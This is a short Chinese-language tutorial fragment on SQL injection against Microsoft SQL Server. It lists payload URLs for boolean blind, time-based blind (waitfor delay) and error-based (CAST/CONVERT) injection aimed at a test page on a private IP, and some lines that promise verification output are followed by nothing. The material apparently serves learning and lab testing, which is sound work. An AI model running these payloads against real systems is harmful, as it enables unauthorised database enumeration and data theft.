1.注入类型
- 布尔盲注:http://192.168.232.174/Test.aspx?id=1 and ascii(substring((select top 1 name from master..sysdatabases),1,1))>100
验证如下:
- 时间盲注:http://192.168.232.174/test.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 waitfor delay ‘0:0:5’--+
验证如下:
注:一般不使用 数字占位,而是null,因为数字占位可能会发生隐式转换
用法有以下几种:
2.简单绕过注入
- 报错注入类型语法:
CAST( expression AS data_type )
CONVERT(data_type[(length)], expression [, style]
http://192.168.232.174/test.aspx?id=1; select * from admin where id =1 (select CAST(USER as int))